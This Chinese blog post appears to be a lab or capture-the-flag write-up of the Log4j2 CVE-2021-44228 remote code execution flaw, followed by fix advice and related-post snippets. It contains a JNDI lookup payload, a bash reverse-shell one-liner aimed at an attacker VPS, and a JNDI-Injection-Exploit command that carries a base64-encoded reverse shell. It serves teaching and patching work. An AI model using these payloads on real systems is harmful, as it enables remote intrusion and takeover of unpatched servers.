log4j2 CVE-2021-44228 远程代码执行漏洞

已于 2024-06-03 00:22:54 修改
阅读量555 收藏 4
点赞数
文章标签: web安全 log4j
于 2023-05-17 23:23:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64297700/article/details/130734841
版权

CVE-2021-44228

漏洞简介

  • Apache Log4j2是一个基于Java的日志记录工具,开发者广泛利用该工具将程序的输入输出信息进行日志记录;该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶意请求,触发远程代码执行漏洞,从而获得目标服务器权限;

log4j2了解

  • log4j2是Apache下的java应用常见的开源日志库,其实也就是一个日志记录工具,控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息;

jndi了解

  • jndi通过lookup()方法解析接收自应用程序的信息,从而去对应的服务查找资源,如ldaprmidns等;
格式: ${jndi:rmi:x.x.x.x:1099/xxx}

  • 受影响版本

  • 2.0 <= Apache log4j2 <=2.14.1

环境搭建

漏洞验证

  • 开启环境成功访问靶场,看到如下页面;

在这里插入图片描述

  • 由于log4j2会与jndi进行交互,而jndi又会去对应的服务查找资源,所以利用${jndi:ldap://x.x.x.x}可以成功执行命令时,就可能会存在log4j2漏洞,使用dnslog平台进行测试;

在这里插入图片描述

  • 打开Burp工具漏洞页面点击?????进行抓包;

在这里插入图片描述

  • 将抓到包的payload进行替换;
payload=${jndi:ldap://dnslog给的域名}

在这里插入图片描述
在这里插入图片描述

  • 这一步会有个坑大家需要好好注意下,如果直接发包响应会400,这里需要对内容进行url编码,然后再进行发包即可;

在这里插入图片描述

  • 查看dnslog平台可以看到被成功解析了;

在这里插入图片描述

漏洞复现

  • 通过上面的测试成功验证了确实存在log4j2漏洞,此时有个新的思路,既然可以执行命令,那如果执行的是反弹的命令,不就可以拿到shell了么😁;
  • 将反弹shell的命令进行base64编码,原因是java中如果存在一些特殊的命令字符会有问题,导致反弹失败;
bash -i >& /dev/tcp/vps-ip/监听端口 0>&1: 如果是本地搭建的环境使用kali反弹及其他操作即可,特殊情况需使用vps

在这里插入图片描述

知识小拓展

JNDI,全称为Java命名和目录接口(Java Naming and Directory Interface),是SUN公司提供的一种标准的Java命名系统接口,允许从指定的远程服务器获取并加载对象;JNDI相当于一个用于映射的字典,使得Java应用程序可以和这些命名服务和目录服务之间进行交互;

在这里插入图片描述

  • 将工具下载好后传到vps上,使用java命令进行编译以生成payload;
java -jar JNDI-Injection-Exploit-1.0.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94LngueC54LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A vps-ip

在这里插入图片描述

反弹shell

  • 复制JDK生成的payload,1.7和1.8版本的都好像反弹不成功,这边暂时也不是很清楚啥子原因😂,接下来还是和之前的操作一样替换payload并进行url编码;

在这里插入图片描述

  • vps开启监听1234端口;

在这里插入图片描述

  • 发送编码后的payload可以看到vps上已经成功反弹shell;

在这里插入图片描述

  • /tmp目录下成功拿到flag;

在这里插入图片描述

修复意见

1)设置log4j2.formatMsgNoLookups=True,相当于直接禁止lookup查询出栈也就不可能请求访问到远程的恶意站点;
2)对包含jndi:ldap://jndi:rmi//这样字符串的请求进行拦截,即拦截JNDI语句来防止JNDI注入;
3)对系统进行合理配置,禁止不必要的业务访问外网,配置网络防火墙,禁止系统主动外连网络等;
4)将log4j2升级到最新的安全版本;

下一篇 > fastjson CNVD-2019-22238 远程代码执行漏洞

以上内容就是log4j2 CVE-2021-44228 远程代码执行漏洞复现过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!

橘猫的饼干798
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
idea中使用log4j2打印日志
ygd1994的专栏
05-24 1万+
先去下载log4j的jar包,将log4j-api-2.8.2.jar和log4j-core-2.8.2.jar导入到lib目录自定义log4j2.xml文件到src目录下 配置文件如下: <?xml version="1.0" encoding="UTF-8"?> <!-- status : 这个用于设置log4j2自身内部的信息输出,可以不设置,当设置成trace时,会看到log4j2
Apache Log4j2 远程代码执行漏洞 2.15.0(CVE-2021-44228)
weixin_44047654的博客
01-09 1546
Apache Log4j2 远程代码执行漏洞< 2.15.0(CVE-2021-44228)
log4j2远程代码执行漏洞CVE-2021-44228
最新发布
流水不争先,争的是滔滔不绝
05-22 276
log4j2远程代码执行漏洞
Log4j2远程命令执行CVE-2021-44228
qq_40646572的博客
05-12 1409
我采用的是较为简单便捷的方法进行复现,全程只是使用了JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具,另外,还可以使用ysoserial-0.0.6-SNAPSHOT-all.jar以及marshalsec-0.0.3-SNAPSHOT-all.jar。使用jndi注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar ,进行rmi注入。启动服务后,进入主页面,点击页面中的?链接,跳转到,目标地址。及时升级log4j组件。
Log4j2远程代码执行漏洞CVE-2021-44228
wangzhifei1的博客
01-16 2082
CVE-2021-44228,被广泛称为“Log4Shell”,是一个高危的远程代码执行漏洞,影响了Apache Log4j 2,这是一个在Java应用程序中广泛使用的日志记录库。
Log4J2远程代码执行漏洞复现(CVE-2021-44228
box
04-18 8339
Log4J代码执行漏洞复现(CVE-2021-44228) 受影响版本log4j版本:2.0 <= Apache Log4j 2 <= log4j-2.15.0-rc1 受影响的应用及组件:Apache Solr、Apache Struts2、Apache Flink、Apache Druid、spring-boot-strater-log4j2、ElasticSearch、Apache Flume、Dubbo、Redis、Logstash、Apache Kafka等 复现环境:java ver
CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞(反弹shell)
PolarPeak的博客
12-10 5292
本地复现 https://github.com/tangxiaofeng7/apache-log4j-poc log4j.java内容 import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class);
Log4j2远程命令执行(CVE-2021-44228)复现
weixin_47781572的博客
03-01 6329
漏洞说明 Log4j是Apache的开源日志记录组件。Log4j2Log4j的升级版本,通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。 由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
安全漏洞:Apache Log4j2 远程代码执行漏洞CVE-2021-44228
简单记录
09-02 2039
Apache Log4j2 远程代码执行漏洞CVE-2021-44228)解决方法
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
尽管其 CVE 等级很高,但成功利用所需的复杂性表明广泛滥用的可能性很低,这与广泛利用的 Log4j RCE 漏洞不同。  有趣的是,Chromium似乎也利用了unrar库:...
Apache Log4j2 远程代码执行漏洞检测工具
12-15
针对这个漏洞,开发出了专门的Apache Log4j2远程代码执行漏洞检测工具,这些工具包括针对Windows和Linux操作系统的版本。这些工具的主要目的是帮助管理员和安全专家迅速识别其环境中是否存在易受攻击的Log4j2实例。 ...
log4j-api-2.12.4.ja和log4j-core-2.12.4.jar
04-27
提到的"避免log4j漏洞问题"可能指的是在2021年出现的严重安全漏洞——CVE-2021-44228,也被称为Log4Shell。这个漏洞允许攻击者通过注入恶意的JNDI(Java Naming and Directory Interface)链接来执行远程代码。...
log4j2 远程代码执行漏洞复现(CVE-2021-44228
Welcome To Myon'Blog !
03-08 5946
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码
Log4j2安全 JNDI漏洞 CVE-2021-44228
Keep learing, and stay fast
12-15 1573
12 月 10 日,Apache 开源项目 Log4j远程代码执行漏洞CVE-2021-44228) 被公开
Apache Log4j2远程代码执行漏洞CVE-2021-44228
Arlo的博客
12-30 1563
发布日期:2021-12-12 名称:Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) 级别:严重 描述信息:Apache Log4j2是一个基于Java的日志记录工具,是Log4j的升级,在其前身Log4j 1.x基础上提供了Logback中可用的很多优化,同时修复了Logback架构中的一些问题,是目前最优秀的Java日志框架之一。该日志框架被大量用于业务系统开发,用来记录日志信息。开发者可能会将用户输入造成的错误信息写
Log4J2漏洞CVE-2021-44228)原理
m0_62466350的博客
05-07 2601
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发 者可以利用该工具将程序的输入输出信息进行日志记录。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏 洞。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,导致攻击者可直接构造恶 意请求,触发远程代码执行漏洞,从而获得目标服务器权限。漏洞适应版本:2.0
Log4j2远程代码执行漏洞复现(cve-2021-44228)
热门推荐
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4j是Apache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
apache log4j2 任意代码执行漏洞(cve-2021-44228)
09-18
Apache Log4j2是一个广泛使用的开源日志管理工具。然而,最近发现了一个严重的漏洞,被命名为CVE-2021-44228。这个漏洞允许攻击者通过恶意构造的日志事件来执行任意代码,导致系统被远程攻击者完全控制。 漏洞是由于Log4j2中的PatternLayout布局处理器存在一个特定的模式转换字符(%d、%i、%m、%p等)被恶意利用的问题。攻击者可以将恶意代码嵌入到日志事件中,并通过向受影响的Log4j2实例发送恶意请求触发此漏洞。一旦攻击成功,攻击者可以在受影响的应用程序上执行任意的远程代码。 这个漏洞的危害性非常高,因为日志功能几乎在每个应用程序中都得到广泛使用。攻击者可以通过恶意日志事件执行各种攻击,包括远程命令执行、数据库注入、代码执行等。受影响的应用程序可能会泄露敏感数据、遭受损坏甚至被完全控制。 解决这个漏洞的最佳方法是升级到Log4j2的最新版本。Apache已经发布了修复此漏洞的版本,更具体地说是2.15.0和2.16.0,这些版本不再处理这类模式转换字符。如果无法立即更新,可以考虑在应用程序中禁用PatternLayout布局处理器,或者使用其他日志管理框架替代Log4j2。 此外,还建议及时监测应用程序的日志活动,并对异常的日志事件进行审查。如果遇到可疑的日志事件,应立即采取行动,例如暂停相关服务、排查日志事件来源、加强网络安全防护等。 总之,Apache Log4j2CVE-2021-44228漏洞是一个严重的安全威胁,可能导致系统被完全控制。及时升级到修复版本、加强监控和审查日志活动是应对该漏洞的关键步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值